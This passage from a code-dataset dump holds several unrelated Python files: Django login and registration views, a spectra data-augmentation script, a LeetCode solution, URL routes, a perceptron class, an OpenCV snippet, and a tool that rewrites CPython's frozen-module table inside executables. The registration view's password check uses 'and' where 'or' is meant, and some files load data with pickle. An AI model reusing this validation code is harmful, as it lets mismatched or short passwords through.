_pay(request, user_game_id)\n freedonate = p['freedonate']\n if freedonate == '1':\n shipping(pay_data['dpo'].number, True)\n return HttpResponseRedirect(reverse('account:order'))\n url = creat_payment_url(pay_data, request.META['HTTP_USER_AGENT'])\n return HttpResponseRedirect(url)\n\n\ndef thankyou(request):\n t = \"account/thankyou.html\"\n number = request.GET.get('number')\n d = {}\n if number:\n dpo = get_object_or_404(DirectPaymentOrder, number=number)\n dg = dpo.dpogift_set.all()\n d['dg'] = dg\n d['mail'] = True\n return render(request, t, d)\n\n\ndef gift(request):\n t = \"account/gift.html\"\n p = option()\n data = {'option': p, }\n user_game_id = int(p['gift_user_game_id'])\n ug = get_object_or_404(UserGame, pk=user_game_id)\n data['paymentgoods'] = ug.game.paymentgood_set.filter(anyone=0)\n return render(request, t, data)\n\n\ndef gift_pay(request):\n p = option()\n user_game_id = int(p['gift_user_game_id'])\n pay_data = _pay(request, user_game_id)\n freegift = p['freegift']\n if freegift == '1':\n shipping_gift(pay_data['dpo'].number, True)\n url = reverse('thankyou') + '?number=' + pay_data['dpo'].number\n return HttpResponseRedirect(url)\n url = creat_payment_url(pay_data, request.META['HTTP_USER_AGENT'])\n return HttpResponseRedirect(url)\n\n\ndef index(request):\n d = {}\n if request.GET.get('password_is_wrong'):\n d = {\n 'password_is_wrong': True,\n }\n if request.GET.get('user_is_lock'):\n d = {\n 'user_is_lock': True,\n }\n if request.GET.get('after_register'):\n d = {\n 'after_register': True,\n }\n if request.user.is_anonymous():\n return render(request, \"account/index.html\", d)\n else:\n return HttpResponseRedirect(reverse('account:account'))\n\n\n@require_POST\ndef user_login(request):\n try:\n username = request.POST['username']\n password = request.POST['password']\n user = authenticate(username=username, password=password)\n except:\n return HttpResponseRedirect(reverse('index'))\n\n if user is not None:\n if user.is_active:\n login(request, user)\n return HttpResponseRedirect(reverse('account:account'))\n else:\n url = \"%s?user_is_lock=true\" % reverse('index')\n else:\n url = \"%s?password_is_wrong=true\" % reverse('index')\n return HttpResponseRedirect(url)\n\n\ndef 
user_register(request):\n d = {}\n if request.method == 'GET':\n if request.GET.get('username_is_used'):\n d = {\n 'username_is_used': True,\n }\n if request.user.is_anonymous():\n return render(request, \"account/register.html\", d)\n else:\n return HttpResponseRedirect(reverse('account:account'))\n if request.method == 'POST':\n username = request.POST['username']\n password = request.POST['password']\n repeat_password = request.POST['repeat-password']\n if password != repeat_password and len(password) < 6:\n return HttpResponseRedirect(reverse('user_register'))\n try:\n user = User(username=username)\n group = Group.objects.get(name='USER')\n user.set_password(password)\n user.save()\n user.groups.add(group)\n except Exception as e:\n logger = logging.getLogger(__name__)\n logger.error('User Register Exception :{0}'.format(e))\n url = \"%s?username_is_used=true\" % reverse('user_register')\n return HttpResponseRedirect(url)\n url = \"%s?after_register=true\" % reverse('index')\n return HttpResponseRedirect(url)\n\n\ndef user_logout(request):\n logout(request)\n return HttpResponseRedirect(reverse('index'))\n","sub_path":"account/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":14123,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"326925878","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Jul 27 19:38:31 2019\n\n@author: raghav\n\"\"\"\n# This module augments the dataset using some of the strategies suggested in\n# the unified solution paper\nimport numpy as np\nimport matplotlib\nmatplotlib.use('Agg')\n\nfrom matplotlib import pyplot as plt\n\nfrom lrraman_reader import *\n\n# saving the original spectrum variables\nnp.save('ImportantVariables/Original_RRUFFspectra.npy', Ramandata_Raw_final)\nnp.save('ImportantVariables/Original_RRUFFMineralNames.npy', Minerals_Outputs_final)\n\n# Showing Within class variance in the class with maximum minerals\nunique_values, unique_indices, counts = np.unique(Mineral_Targets_values, \n return_index=True,\n return_counts=True)\nmax_counts = max(counts)\nmax_counts_value = np.where(counts == max_counts)\nSame_Class_indices = np.where(Mineral_Targets_values == max_counts_value[0])\nSame_Class_spectra = Ramandata_Raw_final[Same_Class_indices]\nprint(Same_Class_spectra.shape)\nprint(\"The name of the mineral is : \",\n Minerals_Outputs_final[Same_Class_indices][0])\nplt.figure()\nplt.title('Plot explaining within class variance for a particular Mineral: '\n + Minerals_Outputs_final[Same_Class_indices][0])\nfor i in range(Same_Class_spectra.shape[0]):\n Same_Class_Normalised = Same_Class_spectra[i, :]/max(Same_Class_spectra[i,:])\n plt.plot(Same_Class_Normalised)\nplt.savefig('ImportantPlots/Same_Class_Variance.png')\nplt.show()\nprint(\"----------------------------------------------------\")\n\n# removing the spectrum classes with only 2 and 3 spectra's each \na, counts = np.unique(Minerals_Outputs_final, return_counts=True)\nb = np.where(counts == 2)\nc = np.where(counts == 3)\nindexes_toremove = []\n\nfor i in b[0]:\n Mineral_names_toremove = np.where(Minerals_Outputs_final == a[i])\n indexes_toremove += list(Mineral_names_toremove[0])\nindexes_toremove2 = []\nfor i in c[0]:\n Mineral_names_toremove = np.where(Minerals_Outputs_final == a[i])\n indexes_toremove2 += list(Mineral_names_toremove[0])\n\n# Removing those indices\nIndices_delete = indexes_toremove + indexes_toremove2\nRamandata_Allspectra = np.delete(Ramandata_Raw_final, Indices_delete, 
axis=0)\nTargets_Allspectra = np.delete(Minerals_Outputs_final, Indices_delete)\nprint(Ramandata_Allspectra.shape, Targets_Allspectra.shape)\n\nnp.save('ImportantVariables/Reduced_RRUFFspectra', Ramandata_Allspectra)\nnp.save('ImportantVariables/Reduced_RRUFFMineralNames', Targets_Allspectra)\n\n# Making a dictionary and giving it values\nprint(len(set(Targets_Allspectra)))\nMineral_Names = sorted(set(Targets_Allspectra))\nMineral_Dict = dict(zip(Mineral_Names, range(len(set(Targets_Allspectra)))))\nMineral_Targets_values = np.array([Mineral_Dict[value] for value in Targets_Allspectra]).T\n# save the dictionary only after it has been rebuilt for the reduced set of minerals\nnp.save('ImportantVariables/Reduced_RRUFFMineralDict', Mineral_Dict)\n\nprint(\"Spectra removed and saved\")\nprint(\"--------------------------------------------------\")\n\n\n# Making test validation and training split\nX = Ramandata_Allspectra\ny = Mineral_Targets_values\n# Randomly shuffling all the data\nprint(Ramandata_Allspectra.shape, Mineral_Targets_values.shape)\ny = y.reshape(y.shape[0], 1)\nprint(X.shape, y.shape)\nX_ymatrix = np.append(X, y, axis=1)\nnp.random.shuffle(X_ymatrix)\nX = X_ymatrix[:, 0:X.shape[1]]\ny = X_ymatrix[:, X.shape[1]]\nprint(y, y.shape, X.shape)\n\nunique_values_test, unique_indices_test, counts_test = np.unique(y, return_index=True, return_counts=True)\n\nX_test_validation = X[unique_indices_test]\ny_test_validation = y[unique_indices_test]\n\nprint(y_test_validation.shape)\nprint(X_test_validation.shape)\n\nX_train = np.delete(X, unique_indices_test, axis=0)\ny_train = np.delete(y, unique_indices_test)\n\nprint(X_train.shape, y_train.shape)\n\n# Saving the dataset\nnp.save('ImportantVariables/Original_X_train', X_train)\nnp.save('ImportantVariables/Original_Y_train', y_train)\nnp.save('ImportantVariables/Original_X_test', X_test_validation)\nnp.save('ImportantVariables/Original_Y_test', y_test_validation)\n\nprint(\"Training and test sets made and data saved\")\nprint(\"-------------------------------------------\")\n\n\n# Showing the histogram for the Class Counts\na, counts = np.unique(Mineral_Targets_values, return_counts=True)\nhist = np.histogram(counts)\nplt.figure()\nplt.title('Class Proportions')\nplt.hist(counts, np.arange(40))\nplt.xlabel('The count of each class')\nplt.ylabel('Number of such Classes')\nplt.savefig('ImportantPlots/ClassProportions.png')\nplt.show()\n\nprint(\"Class Proportions shown and figure saved\")\nprint(\"-------------------------------------------\")\n\n\n# Data Augmentation\n\nprint(\"Time for some Data Augmentation\")\nprint(\"The original shapes and types are as follows\")\nprint(Ramandata_Raw_final.shape, Minerals_Outputs_final.shape)\nprint(Ramandata_Allspectra.shape, Mineral_Targets_values.shape)\nprint(X_train.shape, y_train.shape, X_train.dtype, y_train.dtype)\n\n# print(augmented_targets.shape,augmented_targets)\naugmented_spectra = np.ones((1,701), dtype='float64')\naugmented_targets = np.array((1,), dtype='float64')\nfor j in range(3):\n    d1 = np.arange(-15, 15, 1)\n    d = np.delete(d1, np.where(d1 == 0))\n    print(d)\n    for i in range(X_train.shape[0]):\n        spectrum1 = X_train[i]\n        coin_toss = np.random.choice(d)\n
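        # np.roll shifts the spectrum cyclically, so the samples that wrap around the\n        # ends are overwritten below with edge padding to imitate a plain (non-cyclic) shift.\n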
        spectrum2 = np.roll(spectrum1, coin_toss)\n        if np.sign(coin_toss) < 0:\n            spectrum3 = spectrum2[:coin_toss]\n            spectrum4 = np.pad(spectrum3, (0, np.absolute(coin_toss)), 'edge')\n        else:\n            spectrum3 = spectrum2[coin_toss:]\n            spectrum4 = np.pad(spectrum3, (coin_toss, 0), 'edge')\n        spectrum4 = spectrum4.reshape(1, 701)\n        augmented_spectra = np.append(augmented_spectra, spectrum4, axis=0)\n        augmented_targets = np.append(augmented_targets, y_train[i])\naugmented_spectra = augmented_spectra[1:, :]\naugmented_targets = augmented_targets[1:]\nX_train_augmented1 = np.append(X_train, augmented_spectra, axis=0)\ny_train_augmented1 = np.append(y_train, augmented_targets)\n\nplt.figure()\nplt.title('Observe the shifted spectra')\nfor i in range(5):\n    plt.plot(augmented_spectra[i, :]/max(augmented_spectra[i, :]))\n    plt.plot(X_train[i, :]/max(X_train[i, :]))\nplt.savefig('ImportantPlots/Data_Augmentation1.png')\nplt.show()\n\nprint(\"The shapes after the first augmentation are as follows\")\nprint(X_train_augmented1.shape, y_train_augmented1.shape)\nprint(\"-------\")\n\n\n# Data augmentation - added noise proportional to magnitude at each wavenumber\naugmented_spectra = np.ones((1, 701), dtype='float64')\naugmented_targets = np.array((1,), dtype='float64')\nfor j in range(3):\n    for i in range(X_train.shape[0]):\n        d = [10, 25, 50, 75, 100]\n        coin_toss = np.random.choice(d)\n        a = X_train[i]\n        b = y_train[i]\n        a = a + np.random.normal(loc=0, scale=np.absolute(a)/coin_toss)\n        # added noise here\n        a = a.reshape(1, 701)\n        augmented_spectra = np.append(augmented_spectra, a, axis=0)\n        augmented_targets = np.append(augmented_targets, b)\naugmented_spectra = augmented_spectra[1:, :]\naugmented_targets = augmented_targets[1:]\nX_train_augmented2 = np.append(X_train_augmented1, augmented_spectra, axis=0)\ny_train_augmented2 = np.append(y_train_augmented1, augmented_targets)\n\nplt.figure()\nplt.title('Spectra with added noise')\nfor i in range(5):\n    plt.plot(augmented_spectra[i, :]/max(augmented_spectra[i]))\n    plt.plot(X_train[i, :]/max(X_train[i]))\nplt.savefig('ImportantPlots/Data_Augmentation2.png')\nplt.show()\n\nprint(\"The shapes after data augmentation are as follows\")\nprint(X_train_augmented2.shape, y_train_augmented2.shape)\nprint(\"------\")\n\n# Randomly shuffling all the training data\nprint(X_train_augmented2.shape, y_train_augmented2.shape)\ny_train_augmented2 = y_train_augmented2.reshape(y_train_augmented2.shape[0], 1)\nprint(X_train_augmented2.shape, y_train_augmented2.shape)\nX_ytrainmatrix = np.append(X_train_augmented2, y_train_augmented2, axis=1)\nnp.random.shuffle(X_ytrainmatrix)\nX_train_final = X_ytrainmatrix[:, 0:X_train_augmented2.shape[1]]\ny_train_final = X_ytrainmatrix[:, X_train_augmented2.shape[1]]\nprint(y_train_final, y_train_final.shape, X_train_final.shape)\n\nprint(\"DATA IS SHUFFLED AND AUGMENTED\")\nnp.save('ImportantVariables/X_train_final_unnormalised', X_train_final)\nnp.save('ImportantVariables/y_train_final_unnormalised', y_train_final)\nprint(\"------------------------------------------\")\n\n# Normalising the spectra to max value\nprint(X_train_final.shape)\n# plt.plot(X_train_final[0,:])\n# plt.show()\nmax_values = np.amax(X_train_final, axis=1)\nprint(max_values.shape)\nX_train_final = X_train_final/max_values.reshape(X_train_final.shape[0], 1)\n# plt.plot(X_train_final[0,:])\n# plt.show()\n\n# normalising by max value for the X_test_validation\nprint(X_test_validation.shape)\n# plt.plot(X_test_validation[0,:])\n# plt.show()\nmax_values = np.amax(X_test_validation, axis=1)\nprint(max_values.shape)\nX_test_validation = X_test_validation/max_values.reshape(X_test_validation.shape[0],1)\n# plt.plot(X_test_validation[0,:])\n# plt.show()\nprint(X_train_final.shape, X_test_validation.shape)\nprint(\"DATA IS NORMALISED AND READY FOR TRAINING\")\nnp.save('ImportantVariables/X_train_final_normalised', X_train_final)\nnp.save('ImportantVariables/y_train_final_normalised', 
y_train_final)\nnp.save('ImportantVariables/X_test_validation_normalised', X_test_validation)\nnp.save('ImportantVariables/y_test_validation_normalised', y_test_validation)\nprint(\"DATA IS ALSO SAVED\")\nprint(\"-------------------------------------------------\")\n","sub_path":"dm2_diagnosis/experiments_deepcnn/deepcnn_training/data_augmentator.py","file_name":"data_augmentator.py","file_ext":"py","file_size_in_byte":9589,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"24707998","text":"#\n# @lc app=leetcode id=100 lang=python\n#\n# [163] Missing Ranges\n#\n# https://www.lintcode.com/problem/missing-ranges/description\n#\n\n#\n# Given a sorted integer array where the range of elements are in the inclusive range [lower, upper], return its missing ranges.\n# Example 1\n# Input:\n# nums = [0, 1, 3, 50, 75], lower = 0 and upper = 99\n# Output:\n# [\"2\", \"4->49\", \"51->74\", \"76->99\"]\n# Explanation:\n# in range[0,99], the missing range includes:range[2,2],range[4,49],range[51,74] and range[76,99]\n\n# Example 2\n# Input:\n# nums = [0, 1, 2, 3, 7], lower = 0 and upper = 7\n# Output:\n# [\"4->6\"]\n# Explanation:\n# in range[0,7],the missing range include range[4,6]\n\n# Your submission beats 34.43% Submissions!\nclass Solution:\n \"\"\"\n @param: nums: a sorted integer array\n @param: lower: An integer\n @param: upper: An integer\n @return: a list of its missing ranges\n \"\"\"\n '''\n def findMissingRanges(self, nums, lower, upper):\n # write your code here\n result = []\n # nums is empty\n if(not nums or len(nums) == 0):\n result.append(self.helper(lower, upper))\n return result\n \n # Edge case 1) Missing ranges at the beginning, it is in lower-1\n pre_point = lower -1\n for point in nums:\n if pre_point != point and pre_point+1 != point:\n result.append(self.helper(pre_point+1, point-1))\n pre_point = point\n \n # Edge case 2) Missing ranges at the end\n if nums[-1] < upper:\n result.append(self.helper(nums[-1] + 1, upper))\n \n return result\n '''\n\n def findMissingRanges(self, nums, lower, upper):\n # write your code here\n result = []\n ln = len(nums)\n # Edge case 1) Missing ranges at the beginning, it is in lower-1\n pre = lower -1\n for i in range(ln+1):\n # Edge case 2) Missing ranges at the end\n curr = upper+1 if i==ln else nums[i]\n if curr - pre > 1:\n result.append(self.helper(pre+1, curr-1))\n pre = curr\n \n return result\n\n \n def helper(self, left_point, right_point):\n if left_point == right_point:\n return str(left_point)\n else:\n return str(left_point) + \"->\" + str(right_point) \n \n\n \n\n","sub_path":"Python/163.missing-ranges.py","file_name":"163.missing-ranges.py","file_ext":"py","file_size_in_byte":2360,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"622046624","text":"\"\"\"pharmrep URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/1.9/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.conf.urls import url, include\n 2. 
Add a URL to urlpatterns: url(r'^blog/', include('blog.urls'))\n\"\"\"\nfrom django.conf.urls import url, include\nfrom django.contrib import admin\nfrom django.contrib.auth import views\nfrom django.views.generic import TemplateView\n\nurlpatterns = [\n    url(r'^admin/', admin.site.urls),\n    url(r'^$', TemplateView.as_view(template_name='home.html'), name='home'),\n    url(r'product/', include('product.urls')),\n    url(r'activity/', include('activity.urls')),\n    url(r'reports/', include('reports.urls')),\n    url(r'forum/', include('forum.urls')),\n]\n\nurlpatterns += [\n    url(r'accounts/login/$',\n        views.login,\n        {'template_name': 'core/login.html'},\n        name='login'),\n    url(r'accounts/logout/$',\n        views.logout,\n        {'next_page': '/accounts/login/'},\n        name='logout'),\n]\n\nadmin.site.site_header = 'Pharmacy Reps admin'\n","sub_path":"pharmrep/pharmrep/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1427,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"}
+{"seq_id":"41291563","text":"from sklearn.metrics import accuracy_score, precision_score, recall_score, f1_score\nimport numpy as np\n\nimport pickle\n\nclass Net:\n    def __init__(self, input_count=6, neuron_count=6):\n        self.input_count = input_count\n        self.neuron_count = neuron_count\n\n        self.weights = np.zeros((neuron_count, input_count))\n        self.D = None # inputs\n        self.Y = None # answers\n        \n        self.σ = lambda x: 1 if x > 0.9 else 0\n        self.α = 0.02\n        self.β = 0.0\n\n        self.etalons, self.predictions = [], []\n\n\n    def funk(self, x, i):\n        s = self.β + np.sum(x @ self.weights[i])\n        return self.σ(s)\n    \n    def train(self, i):\n        _w = self.weights[i].copy()\n        for x, y in zip(self.D, self.Y[i]):\n            self.weights[i] += self.α * (y - self.funk(x, i)) * x\n        return (self.weights[i] != _w).any()\n\n    def net(self, vec, other=False):\n        s = [0 for i in range(np.shape(self.weights)[0])]\n        for i in range(len(s)):\n            s[i] = self.funk(vec, i)\n            if s[i] == 1:\n                other = True\n                break\n        if not other:\n            s[0] = 1\n        return s\n\n    def load(self, WEIGHTS_FILE='weights.dat'):\n        with open(WEIGHTS_FILE, 'rb') as f:\n            self.weights = pickle.load(f)\n\n    def save(self, WEIGHTS_FILE='weights.dat'):\n        with open(WEIGHTS_FILE, \"wb\") as f:\n            pickle.dump(self.weights, f)\n\n    def load_data(self, DATA_FILE='data.dat'):\n        with open(DATA_FILE, 'rb') as f:\n            out = pickle.load(f)\n            self.D, self.Y = out[0], out[1]\n\n    def save_data(self, DATA_FILE='data.dat'):\n        with open(DATA_FILE, \"wb\") as f:\n            pickle.dump([self.D, self.Y], f)\n\n    def add_stats(self, etalon, prediction):\n        self.etalons.append(etalon)\n        self.predictions.append(prediction)\n\n    def clear_stats(self):\n        self.etalons = []\n        self.predictions = []\n\n    def show_stats(self):\n        print('Accuracy: {}'.format(accuracy_score(self.etalons, self.predictions)))\n        print('Precision score: {}'.format(precision_score(self.etalons, self.predictions, average='weighted')))\n        print('Recall score: {}'.format(recall_score(self.etalons, self.predictions, average='weighted')))\n        print('F1 score: {}'.format(f1_score(self.etalons, self.predictions, average='weighted')))\n    \n","sub_path":"apps/predicate/nn.py","file_name":"nn.py","file_ext":"py","file_size_in_byte":2208,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"}
+{"seq_id":"308833718","text":"import cv2\nimport site\nimg = cv2.imread('./cross_section_of_communication_pipe.png', cv2.IMREAD_COLOR)\nb, g, r = cv2.split(img)  # OpenCV loads images in BGR channel order\ngbr_img = cv2.merge((g, b, r))\nrbr_img = cv2.merge((r, b, r))\n
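# note: merging the planes in a different order, as above, produces false-colour\n# variants of the image; the preview windows below are left commented out.\n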
# cv2.imshow('Original', img)\n# cv2.imshow('GBR', gbr_img)\n# cv2.imshow('RBR', rbr_img)\n# cv2.waitKey(3000)\n\nprint(site.getsitepackages())","sub_path":"DataScience/AnacondaProjects/opencv_channels_merge.py","file_name":"opencv_channels_merge.py","file_ext":"py","file_size_in_byte":330,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"}
+{"seq_id":"452984637","text":"__all__ = (\"FrozenTable\",)\r\nfrom .BinPatchTools import *\nimport typing\r\nimport struct\r\nfrom pathlib import Path\r\nimport warnings\r\nimport marshal\r\nimport mmap\r\nfrom collections import OrderedDict\r\n\r\nfrom .cpython_frozen_table import *\r\n\r\nfrozenTablePtrImportName = \"PyImport_FrozenModules\"\r\nfrozenTableImportName = \"_\" + frozenTablePtrImportName\r\n\r\n\r\n# from hexdump import hexdump\r\n\r\n\r\nDictT = OrderedDict\r\n\r\n\r\ndef searchBytesWithinRange(haystack:bytes, needle:bytes, start:int, stop:int) -> typing.List[int]:\r\n\tres = []\r\n\tfound = start\r\n\twhile True:\r\n\t\tfound = haystack.find(needle, found, stop)\r\n\t\tif found == -1:\r\n\t\t\tbreak\r\n\r\n\t\tif found:\r\n\t\t\tres.append(found)\r\n\r\n\t\tfound += 1 # next pos\r\n\treturn res\r\n\r\n\r\nclass FrozenTable:\r\n\tdef __init__(self, source: typing.Union[mmap.mmap, Path], unmarshal: bool = False, searchWindowSize: int = 500, intSize:int = 4, paddingSize:int = None) -> None:\r\n\t\t\"\"\"\r\n\t\t`source` is the source of a PE file.\r\n\t\t`unmarshal` controls if the tool should unmarshal objects for further analysis.\r\n\t\t`searchWindowSize` controls the neighbourhood to look for pointers to determine padding and pointer sizes\r\n\t\t\"\"\"\r\n\t\tctor = getFormatCtor(source)\r\n\t\tself.format = ctor(source)\r\n\r\n\t\tif unmarshal:\r\n\t\t\twarnings.warn(\"Uses `marshal` currently -> code execution!\")\r\n\r\n\t\tself.unmarshal = unmarshal\r\n\t\tself.dict = None\r\n\t\tself.intSize = intSize\r\n\t\tself.paddingSize = paddingSize\r\n\t\tself.searchWindowSize = searchWindowSize\r\n\r\n\tdef __enter__(self) -> \"FrozenTable\":\r\n\t\tself.format.__enter__()\r\n\t\tself.parse()\r\n\t\treturn self\r\n\r\n\tdef __exit__(self, *args, **kwargs) -> None:\r\n\t\tself.format.__exit__(*args, **kwargs)\r\n\t\tself.table = None\r\n\t\tself.dict = None\r\n\t\tself.tableOffset = None\r\n\r\n\tdef findHeuristically(self, searchStrStartOffset:int = 0, searchStrEndOffset:int = -1, searchPtrStartOffset:int = 0, searchPtrEndOffset:int = -1, limit:int = 0, namesBank: typing.Tuple[bytes, bytes, bytes, bytes, bytes, bytes] = (b\"__hello__\", b\"__phello__\", b\"_frozen_importlib\", b\"_frozen_importlib_external\", b\"zipimport\", b\"__phello__.spam\") ) -> typing.Tuple[int, int]:\r\n\t\t\"\"\"Tries to heuristically find the table. In order to do that it searches the binary for already-known strings used as names for sections, then searches for pointers to them in the file. In an ELF file pointers can be rewritten by the linker, there are a lot of relocation formulas, and those formulas involve the pointers' addresses, so I don't currently know of a good way to make it work with ELF correctly. But for some files this works, because they have raw virtual addresses in the pointers needed by us.\"\"\"\r\n\t\tfrom math import gcd\r\n\t\tf = self.format.map\r\n\t\taddrs = []\r\n\r\n\t\tfor name in namesBank:\r\n\t\t\tfor nameOfs in searchBytesWithinRange(f, name, searchStrStartOffset, searchStrEndOffset):\r\n\t\t\t\tnamePtr = self.format.offset2Raw(nameOfs)\r\n\t\t\t\t#TODO: bruteforce different relocation modes. Fortunately names are not usually relocated in ELF\r\n\r\n\t\t\t\tif namePtr:\r\n\t\t\t\t\tnamePtrBytes = self.format.ptrPacker.pack(namePtr)\r\n\t\t\t\t\tinitialPtrs = searchBytesWithinRange(f, namePtrBytes, searchPtrStartOffset, searchPtrEndOffset)\r\n\t\t\t\t\tif limit and len(initialPtrs) > limit:\r\n\t\t\t\t\t\tinitialPtrs = initialPtrs[:limit]\r\n\t\t\t\t\taddrs.extend(initialPtrs)\r\n\r\n\t\t#print(addrs)\r\n\t\tminAddr = min(addrs)\r\n\t\t#print(\"minAddr\", hex(minAddr))\r\n\t\tentrySize = 0\r\n\t\tfor addr in addrs:\r\n\t\t\tentrySize = gcd(entrySize, addr - minAddr)\r\n\t\t#print(\"entrySize\", entrySize)\r\n\r\n\t\treturn minAddr, entrySize\r\n\r\n\tdef parse(self) -> None:\r\n\t\t\"\"\"Parses the table. `source` is either `mmap` or `Path`.\"\"\"\r\n\t\ttableRaw = None\r\n\t\tentrySize = None\r\n\r\n\t\ttry:\r\n\t\t\ttableRaw = self.format.findVA(frozenTableImportName)\r\n\t\t\t#print(\"Found from import immediately\", hex(tableRaw))\r\n\t\texcept BaseException:\r\n\t\t\tpass\r\n\r\n\t\tif not tableRaw:\r\n\t\t\ttry:\r\n\t\t\t\tfrozenPtrVA = self.format.findVA(frozenTablePtrImportName)\r\n\t\t\t\tfrozenPtrOffset = self.format.raw2Offset(frozenPtrVA)\r\n\r\n\t\t\t\t#print(\"frozenPtrVA: \", hex(frozenPtrVA))\r\n\t\t\t\t#print(\"frozenPtrOffset: \", hex(frozenPtrOffset))\r\n\r\n\t\t\t\ttableRaw = self.format.parsePtr(frozenPtrOffset)\r\n\t\t\t\t#print(\"Found from import by ptr\", hex(tableRaw))\r\n\r\n\t\t\texcept BaseException:\r\n\t\t\t\tpass\r\n\r\n\t\tif not tableRaw:\r\n\t\t\ttry:\r\n\t\t\t\ttableRaw, entrySize = self.findHeuristically()\r\n\t\t\t\t#print(\"Found heuristically\", hex(tableRaw))\r\n\t\t\texcept BaseException:\r\n\t\t\t\tpass\r\n\r\n\t\tif not tableRaw:\r\n\t\t\traise NotImplementedError(\"Table has not been found\")\r\n\r\n\t\tself.tableOffset = self.format.raw2Offset(tableRaw)\r\n\r\n\t\tkaitStr = KaitaiStream(BytesIO(self.format.map))\r\n\r\n\t\tif self.paddingSize is None:\r\n\t\t\tif entrySize is None:\r\n\t\t\t\t#firstName = self.format.raw2Offset(self.format.parsePtr(self.tableOffset)) # first item of the record is name\r\n\t\t\t\tfirstName = self.format.resolvePtrByOffset(self.tableOffset) # first item of the record is name\r\n\t\t\t\t#print(self.format.map[firstName:firstName+20])\r\n\t\t\t\tentrySize = self.findHeuristically(searchPtrStartOffset=self.tableOffset - self.searchWindowSize, searchPtrEndOffset=self.tableOffset + self.searchWindowSize, limit=0)[1]\r\n\r\n\t\t\tintAndPaddingSize = entrySize - 2 * self.format.byteness\r\n\t\t\tself.paddingSize = intAndPaddingSize - self.intSize\r\n\r\n\t\tassert self.paddingSize == 4 or self.paddingSize == 0\r\n\r\n\t\t#print(\"sizeof(int)\", self.intSize)\r\n\t\t#print(\"padding size\", self.paddingSize)\r\n\r\n\t\tparsed = CpythonFrozenTable(self.format.byteness, self.intSize, self.paddingSize, self.tableOffset, kaitStr)\r\n\r\n\t\tfor i in range(len(parsed.table) - 1):\r\n\t\t\tentry = parsed.table[i]\r\n\t\t\t#print(\"entry.code_size_and_type\", hex(entry.code_size_and_type), entry.code_size_and_type)\r\n\t\t\tresEl = 
CpythonFrozenTable.TranslatedEntry(\r\n\t\t\t\tcode_offset=self.format.raw2Offset(self.format.resolvePtr(\r\n\t\t\t\t\tentry.code_ptr.raw_ptr,\r\n\t\t\t\t\tself.format.offset2Raw(entry.code_ptr._debug[\"raw_ptr\"][\"start\"])\r\n\t\t\t\t)),\r\n\t\t\t\tentry=entry,\r\n\t\t\t\tname_offset=self.format.raw2Offset(self.format.resolvePtr(\r\n\t\t\t\t\tentry.name_ptr.raw_ptr,\r\n\t\t\t\t\tself.format.offset2Raw(entry.name_ptr._debug[\"raw_ptr\"][\"start\"])\r\n\t\t\t\t)),\r\n\t\t\t\t_io=parsed._io, _parent=parsed, _root=parsed._root\r\n\t\t\t)\r\n\t\t\tif self.unmarshal:\r\n\t\t\t\tresEl.obj = marshal.loads(resEl.code)\r\n\r\n\t\t\tparsed.table[i] = resEl\r\n\r\n\t\tself.table = parsed.table\r\n\r\n\t\tself.dict = DictT((el.name, el) for el in iter(self))\r\n\r\n\tdef __iter__(self) -> typing.Iterator[CpythonFrozenTable.TranslatedEntry]:\r\n\t\tfor el in self.table:\r\n\t\t\tif isinstance(el, CpythonFrozenTable.TranslatedEntry):\r\n\t\t\t\tyield el\r\n\r\n\tdef keys(self):\r\n\t\treturn self.dict.keys()\r\n\r\n\tdef values(self):\r\n\t\treturn self.dict.values()\r\n\r\n\tdef items(self):\r\n\t\treturn self.dict.items()\r\n\r\n\tdef getIntTypeLetter(self) -> str:\r\n\t\tif self.intSize == 4:\r\n\t\t\treturn \"i\"\r\n\t\telif self.intSize == 8:\r\n\t\t\treturn \"q\"\r\n\t\telif self.intSize == 2:\r\n\t\t\treturn \"h\"  # struct letter for a 2-byte short (\"d\" would be an 8-byte double)\r\n\t\telse:\r\n\t\t\traise ValueError(\"Unsupported byteness \" + str(self.intSize))\r\n\r\n\tdef writeTable(self) -> None:\r\n\t\t\"\"\"Constructs and writes the table of pointers from self.dict\"\"\"\r\n\r\n\t\toffset = self.tableOffset\r\n\t\t#print(\"tableOffset\", hex(self.tableOffset))\r\n\r\n\t\ts = struct.Struct(self.format.getPtrTypeLetter() * 2 + self.getIntTypeLetter())\r\n\r\n\t\tdef writeItem(name_ptr:int, code_ptr:int, code_size:int, is_package:bool=False):\r\n\t\t\tnonlocal offset\r\n\t\t\tif is_package:\r\n\t\t\t\tcode_size *= -1\r\n\r\n\t\t\tdata = s.pack(name_ptr, code_ptr, code_size) + b\"\\0\"*self.paddingSize\r\n\t\t\tnewOffset = offset + len(data)\r\n\t\t\t#print(hexdump(self.format.map[offset:newOffset], \"return\"), \"->\", hexdump(data, \"return\"))\r\n\r\n\t\t\tself.format.map[offset:newOffset] = data\r\n\t\t\toffset = newOffset\r\n\r\n\t\tfor entry in self.values():\r\n\t\t\twriteItem(entry.entry.name_ptr.raw_ptr, entry.entry.code_ptr.raw_ptr, entry.entry.code_size, entry.entry.is_package)\r\n\r\n\t\twriteItem(0, 0, 0, False)\r\n
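\t# a minimal usage sketch (hypothetical file name), assuming the context-manager flow above:\r\n\t#   with FrozenTable(Path('python.exe')) as t:\r\n\t#       t.modifyEntry('__hello__', newCode)  # patch the code bytes in place\r\n\t#       t.writeTable()  # then rewrite the pointer table\r\n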
